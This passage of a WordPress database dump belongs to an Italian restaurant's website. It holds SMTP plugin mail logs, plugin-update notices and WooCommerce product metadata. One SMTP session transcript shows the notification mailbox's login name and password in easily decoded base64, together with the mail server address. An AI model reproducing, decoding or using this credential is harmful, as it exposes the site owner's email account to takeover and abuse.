automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.15 to 2.3.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37850,3718,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37849,3718,'to_header','webmaster@baldisserri.com'),(37847,3718,'success',''),(37848,3718,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37846,3718,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37694,3701,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 06 Jan 2021 18:59:28 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<stanszoqcjq@demo.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: stanszoqcjq@demo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <f198ff20891b5d5556bc0facbb810502@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Wed, 06 Jan 2021 23:59:28 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi stanszoqcjq,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>stanszoqcjq</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kxIi8-0006FW-S0\r\n'),(37693,3701,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37702,3702,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Akismet Anti-Spam (from version 4.1.7 to 4.1.8)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37701,3702,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37700,3702,'original_to','webmaster@baldisserri.com'),(37699,3702,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37698,3702,'to_header','webmaster@baldisserri.com'),(37696,3702,'success',''),(37697,3702,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37695,3702,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37712,3703,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Akismet Anti-Spam (from version 4.1.7 to 4.1.8)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37711,3703,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37710,3703,'original_to','webmaster@baldisserri.com'),(37709,3703,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37708,3703,'to_header','webmaster@baldisserri.com'),(37707,3703,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37705,3703,'solution','Not found, check status column for more info.'),(37706,3703,'success','1'),(37715,3704,'solution','All good, mail sent.'),(33339,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33340,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33341,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33342,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33343,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33344,2941,'mkdf_page_content_behind_header_meta','no'),(33345,2941,'mkdf_page_content_padding','115px 0 100px 0'),(33346,2941,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(33347,2941,'portfolio_single_back_to_link','610'),(33348,2941,'mkdf_disable_vertical_header_background_image_meta','no'),(33349,2941,'mkdf_disable_header_widget_areas_meta','no'),(33350,2941,'slide_template','default'),(33351,2941,'_wpb_vc_js_status','true'),(33352,2941,'mkdf-portfolio-image-gallery','567,566,565'),(33353,2941,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(33354,2941,'mkdf_portfolio_single_template_meta','gallery'),(33355,2941,'_thumbnail_id','1099'),(33356,2941,'_wp_old_slug','h6-5'),(33357,2941,'_dp_original','645'),(33358,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33359,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33360,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33361,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33362,2942,'mkdf_page_content_behind_header_meta','no'),(33363,2942,'mkdf_page_content_padding','115px 0 100px 0'),(33364,2942,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(33365,2942,'portfolio_single_back_to_link','610'),(33366,2942,'mkdf_disable_vertical_header_background_image_meta','no'),(33367,2942,'mkdf_disable_header_widget_areas_meta','no'),(33368,2942,'slide_template','default'),(33369,2942,'_wpb_vc_js_status','true'),(33370,2942,'mkdf-portfolio-image-gallery','565,566,567'),(33371,2942,'mkdf_portfolio_single_template_meta','small-slider'),(33372,2942,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(33373,2942,'_thumbnail_id','1097'),(33374,2942,'_wp_old_slug','h6-4'),(33375,2942,'_wp_old_slug','cream-soup'),(33376,2942,'_dp_original','644'),(38423,3753,'_menu_item_menu_item_parent','3727'),(38422,3753,'_menu_item_type','custom'),(38421,3752,'_menu_item_icon','null'),(38420,3752,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38419,3752,'_menu_item_url','#'),(38418,3752,'_menu_item_xfn',''),(38417,3752,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38416,3752,'_menu_item_target',''),(38415,3752,'_menu_item_object','custom'),(38413,3752,'_menu_item_menu_item_parent','3727'),(38414,3752,'_menu_item_object_id','3752'),(38412,3752,'_menu_item_type','custom'),(33392,3106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33393,3106,'_wc_review_count','1'),(33394,3106,'_wc_rating_count','a:1:{i:4;i:1;}'),(33395,3106,'_wc_average_rating','4.00'),(33396,3106,'_thumbnail_id','38'),(33397,3106,'mkdf_show_new_sign_woo_meta','no'),(33398,3106,'_sku','PR0014'),(33399,3106,'_regular_price','48'),(33400,3106,'_sale_price',''),(33401,3106,'_sale_price_dates_from',''),(33402,3106,'_sale_price_dates_to',''),(33403,3106,'total_sales','0'),(33404,3106,'_tax_status','taxable'),(33405,3106,'_tax_class',''),(33406,3106,'_manage_stock','no'),(33407,3106,'_backorders','no'),(33408,3106,'_sold_individually','no'),(33409,3106,'_weight','310'),(33410,3106,'_length',''),(33411,3106,'_width',''),(33412,3106,'_height',''),(33413,3106,'_upsell_ids','a:0:{}'),(33414,3106,'_crosssell_ids','a:0:{}'),(33415,3106,'_purchase_note',''),(33416,3106,'_default_attributes','a:0:{}'),(33417,3106,'_virtual','no'),(33418,3106,'_downloadable','no'),(33419,3106,'_product_image_gallery',''),(33420,3106,'_download_limit','-1'),(33421,3106,'_download_expiry','-1'),(33422,3106,'_stock',''),(33423,3106,'_stock_status','instock'),(33424,3106,'_product_version','3.4.3'),(33425,3106,'_price','48'),(33426,3106,'slide_template','default'),(33427,3106,'_wpb_vc_js_status','false'),(33428,3106,'_wp_old_slug','crispy-sesame-cake'),(33429,3106,'_wp_old_slug','charleston-shrimp-grits'),(33430,3106,'_wp_old_slug','garnished-charleston-shrimp'),(33431,3106,'_wp_old_slug','garnished-magnolias-shrimp'),(33432,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33433,98,'_sku','PR0015'),(33434,98,'_regular_price','67'),(33435,98,'_sale_price',''),(33436,98,'_sale_price_dates_from',''),(33437,98,'_sale_price_dates_to',''),(33438,98,'total_sales','0'),(33439,98,'_tax_status','taxable'),(33440,98,'_tax_class',''),(33441,98,'_manage_stock','no'),(33442,98,'_backorders','no'),(33443,98,'_sold_individually','no'),(33444,98,'_weight','400'),(33445,98,'_length',''),(33446,98,'_width',''),(33447,98,'_height',''),(33448,98,'_upsell_ids','a:0:{}'),(33449,98,'_crosssell_ids','a:0:{}'),(33450,98,'_purchase_note',''),(33451,98,'_default_attributes','a:0:{}'),(33452,98,'_virtual','no'),(33453,98,'_downloadable','no'),(33454,98,'_product_image_gallery',''),(33455,98,'_download_limit','-1'),(33456,98,'_download_expiry','-1'),(33458,98,'_stock',''),(33459,98,'_stock_status','instock'),(33460,98,'_wc_average_rating','3.50'),(33461,98,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(33462,98,'_wc_review_count','2'),(33463,98,'_downloadable_files','a:0:{}'),(33464,98,'_product_attributes','a:0:{}'),(33465,98,'_product_version','3.4.3'),(33466,98,'_price','67'),(33467,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33468,98,'mkdf_show_new_sign_woo_meta','no'),(33469,98,'slide_template','default'),(33470,98,'_wpb_vc_js_status','false'),(33471,98,'_wp_old_slug','tuna-with-crispy-artichoke'),(33472,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33473,3107,'_sku','PR0016'),(33474,3107,'_regular_price','73'),(33475,3107,'_sale_price',''),(33476,3107,'_sale_price_dates_from',''),(33477,3107,'_sale_price_dates_to',''),(33478,3107,'total_sales','0'),(33479,3107,'_tax_status','taxable'),(33480,3107,'_tax_class',''),(33481,3107,'_manage_stock','no'),(33482,3107,'_backorders','no'),(33483,3107,'_sold_individually','no'),(33484,3107,'_weight','250'),(33485,3107,'_length',''),(33486,3107,'_width',''),(33487,3107,'_height',''),(33488,3107,'_upsell_ids','a:0:{}'),(33489,3107,'_crosssell_ids','a:0:{}'),(33490,3107,'_purchase_note',''),(33491,3107,'_default_attributes','a:0:{}'),(33492,3107,'_virtual','no'),(33493,3107,'_downloadable','no'),(33494,3107,'_product_image_gallery',''),(33495,3107,'_download_limit','-1'),(33496,3107,'_download_expiry','-1'),(33497,3107,'_thumbnail_id','40'),(33498,3107,'_stock',''),(33499,3107,'_stock_status','instock'),(33500,3107,'_wc_average_rating','5.00'),(33501,3107,'_wc_rating_count','a:1:{i:5;i:1;}'),(33502,3107,'_wc_review_count','1'),(33503,3107,'_downloadable_files','a:0:{}'),(33504,3107,'_product_attributes','a:0:{}'),(33505,3107,'_product_version','3.4.3'),(33506,3107,'_price','73'),(33507,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33508,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33509,3107,'mkdf_show_new_sign_woo_meta','no'),(33510,3107,'slide_template','default'),(33511,3107,'_wpb_vc_js_status','false'),(33512,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33513,3108,'_sku','PR0017'),(33514,3108,'_regular_price','58'),(33515,3108,'_sale_price',''),(33516,3108,'_sale_price_dates_from',''),(33517,3108,'_sale_price_dates_to',''),(33518,3108,'total_sales','0'),(33519,3108,'_tax_status','taxable'),(33520,3108,'_tax_class',''),(33521,3108,'_manage_stock','no'),(33522,3108,'_backorders','no'),(33523,3108,'_sold_individually','no'),(33524,3108,'_weight','315'),(33525,3108,'_length',''),(33526,3108,'_width',''),(33527,3108,'_height',''),(33528,3108,'_upsell_ids','a:0:{}'),(33529,3108,'_crosssell_ids','a:0:{}'),(33530,3108,'_purchase_note',''),(33531,3108,'_default_attributes','a:0:{}'),(33532,3108,'_virtual','no'),(33533,3108,'_downloadable','no'),(33534,3108,'_product_image_gallery',''),(33535,3108,'_download_limit','-1'),(33536,3108,'_download_expiry','-1'),(33537,3108,'_thumbnail_id','41'),(33538,3108,'_stock',''),(33539,3108,'_stock_status','outofstock'),(33540,3108,'_wc_average_rating','3.00'),(33541,3108,'_wc_rating_count','a:1:{i:3;i:1;}'),(33542,3108,'_wc_review_count','1'),(33543,3108,'_downloadable_files','a:0:{}'),(33544,3108,'_product_attributes','a:0:{}'),(33545,3108,'_product_version','3.4.3'),(33546,3108,'_price','58'),(33547,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33548,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33549,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33550,3108,'mkdf_show_new_sign_woo_meta','no'),(33551,3108,'slide_template','default'),(33552,3108,'_wpb_vc_js_status','false'),(33553,3108,'_wp_old_slug','gadabout-with-salad'),(33554,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33555,3109,'_sku','PR0018'),(33556,3109,'_regular_price','80'),(33557,3109,'_sale_price','72'),(33558,3109,'_sale_price_dates_from',''),(33559,3109,'_sale_price_dates_to',''),(33560,3109,'total_sales','0'),(33561,3109,'_tax_status','taxable'),(33562,3109,'_tax_class',''),(33563,3109,'_manage_stock','no'),(33564,3109,'_backorders','no'),(33565,3109,'_sold_individually','no'),(33566,3109,'_weight','215'),(33567,3109,'_length',''),(33568,3109,'_width',''),(33569,3109,'_height',''),(33570,3109,'_upsell_ids','a:0:{}'),(33571,3109,'_crosssell_ids','a:0:{}'),(33572,3109,'_purchase_note',''),(33573,3109,'_default_attributes','a:0:{}'),(33574,3109,'_virtual','no'),(33575,3109,'_downloadable','no'),(33576,3109,'_product_image_gallery',''),(33577,3109,'_download_limit','-1'),(33578,3109,'_download_expiry','-1'),(33580,3109,'_stock',''),(33581,3109,'_stock_status','instock'),(33582,3109,'_wc_average_rating','5.00'),(33583,3109,'_wc_rating_count','a:1:{i:5;i:1;}'),(33584,3109,'_wc_review_count','1'),(33585,3109,'_downloadable_files','a:0:{}'),(33586,3109,'_product_attributes','a:0:{}'),(33587,3109,'_product_version','3.4.3'),(33588,3109,'_price','72'),(33589,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33590,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33591,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33592,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33593,3109,'mkdf_show_new_sign_woo_meta','no'),(33594,3109,'slide_template','default'),(33595,3109,'_wpb_vc_js_status','false'),(33596,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33597,3110,'_sku','PR0019'),(33598,3110,'_regular_price','67'),(33599,3110,'_sale_price',''),(33600,3110,'_sale_price_dates_from',''),(33601,3110,'_sale_price_dates_to',''),(33602,3110,'total_sales','0'),(33603,3110,'_tax_status','taxable'),(33604,3110,'_tax_class',''),(33605,3110,'_manage_stock','no'),(33606,3110,'_backorders','no'),(33607,3110,'_sold_individually','no'),(33608,3110,'_weight','150'),(33609,3110,'_length',''),(33610,3110,'_width',''),(33611,3110,'_height',''),(33612,3110,'_upsell_ids','a:0:{}'),(33613,3110,'_crosssell_ids','a:0:{}'),(33614,3110,'_purchase_note',''),(33615,3110,'_default_attributes','a:0:{}'),(33616,3110,'_virtual','no'),(33617,3110,'_downloadable','no'),(33618,3110,'_product_image_gallery',''),(33619,3110,'_download_limit','-1'),(33620,3110,'_download_expiry','-1'),(33621,3110,'_thumbnail_id','43'),(33622,3110,'_stock',''),(33623,3110,'_stock_status','instock'),(33624,3110,'_wc_average_rating','4.00'),(33625,3110,'_wc_rating_count','a:1:{i:4;i:1;}'),(33626,3110,'_wc_review_count','1'),(33627,3110,'_downloadable_files','a:0:{}'),(33628,3110,'_product_attributes','a:0:{}'),(33629,3110,'_product_version','3.4.3'),(33630,3110,'_price','67'),(33631,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33632,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33633,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33634,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33635,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33636,3110,'mkdf_show_new_sign_woo_meta','no'),(33637,3110,'slide_template','default'),(33638,3110,'_wpb_vc_js_status','false'),(33639,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33640,3111,'_sku','PR0020'),(33641,3111,'_regular_price','67'),(33642,3111,'_sale_price',''),(33643,3111,'_sale_price_dates_from',''),(33644,3111,'_sale_price_dates_to',''),(33645,3111,'total_sales','0'),(33646,3111,'_tax_status','taxable'),(33647,3111,'_tax_class',''),(33648,3111,'_manage_stock','no'),(33649,3111,'_backorders','no'),(33650,3111,'_sold_individually','no'),(33651,3111,'_weight','150'),(33652,3111,'_length',''),(33653,3111,'_width',''),(33654,3111,'_height',''),(33655,3111,'_upsell_ids','a:0:{}'),(33656,3111,'_crosssell_ids','a:0:{}'),(33657,3111,'_purchase_note',''),(33658,3111,'_default_attributes','a:0:{}'),(33659,3111,'_virtual','no'),(33660,3111,'_downloadable','no'),(33661,3111,'_product_image_gallery',''),(33662,3111,'_download_limit','-1'),(33663,3111,'_download_expiry','-1'),(33665,3111,'_stock',''),(33666,3111,'_stock_status','instock'),(33667,3111,'_wc_average_rating','4.00'),(33668,3111,'_wc_rating_count','a:1:{i:4;i:1;}'),(33669,3111,'_wc_review_count','1'),(33670,3111,'_downloadable_files','a:0:{}'),(33671,3111,'_product_attributes','a:0:{}'),(33672,3111,'_product_version','3.4.3'),(33673,3111,'_price','67'),(33674,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33675,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33676,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33677,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33678,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33679,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33680,3111,'mkdf_show_new_sign_woo_meta','no'),(33681,3111,'slide_template',''),(33682,3111,'_wpb_vc_js_status','false'),(33683,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33684,177,'_sku','PR0021'),(33685,177,'_regular_price','86'),(33686,177,'_sale_price',''),(33687,177,'_sale_price_dates_from',''),(33688,177,'_sale_price_dates_to',''),(33689,177,'total_sales','0'),(33690,177,'_tax_status','taxable'),(33691,177,'_tax_class',''),(33692,177,'_manage_stock','no'),(33693,177,'_backorders','no'),(33694,177,'_sold_individually','no'),(33695,177,'_weight','180'),(33696,177,'_length',''),(33697,177,'_width',''),(33698,177,'_height',''),(33699,177,'_upsell_ids','a:0:{}'),(33700,177,'_crosssell_ids','a:0:{}'),(33701,177,'_purchase_note',''),(33702,177,'_default_attributes','a:0:{}'),(33703,177,'_virtual','no'),(33704,177,'_downloadable','no'),(33705,177,'_product_image_gallery',''),(33706,177,'_download_limit','-1'),(33707,177,'_download_expiry','-1'),(33708,177,'_thumbnail_id','45'),(33709,177,'_stock',''),(33710,177,'_stock_status','instock'),(33711,177,'_wc_average_rating','5.00'),(33712,177,'_wc_rating_count','a:1:{i:5;i:1;}'),(33713,177,'_wc_review_count','1'),(33714,177,'_downloadable_files','a:0:{}'),(33715,177,'_product_attributes','a:0:{}'),(33716,177,'_product_version','3.4.3'),(33717,177,'_price','86'),(33718,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33719,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33720,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33721,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33722,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33723,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33724,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33725,177,'mkdf_show_new_sign_woo_meta','yes'),(33726,177,'slide_template','default'),(33727,177,'_wpb_vc_js_status','false'),(33728,177,'_wp_old_slug','pancakes-with-caviar'),(33729,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33730,180,'_sku','PR0022'),(33731,180,'_regular_price','86'),(33732,180,'_sale_price',''),(33733,180,'_sale_price_dates_from',''),(33734,180,'_sale_price_dates_to',''),(33735,180,'total_sales','0'),(33736,180,'_tax_status','taxable'),(33737,180,'_tax_class',''),(33738,180,'_manage_stock','no'),(33739,180,'_backorders','no'),(33740,18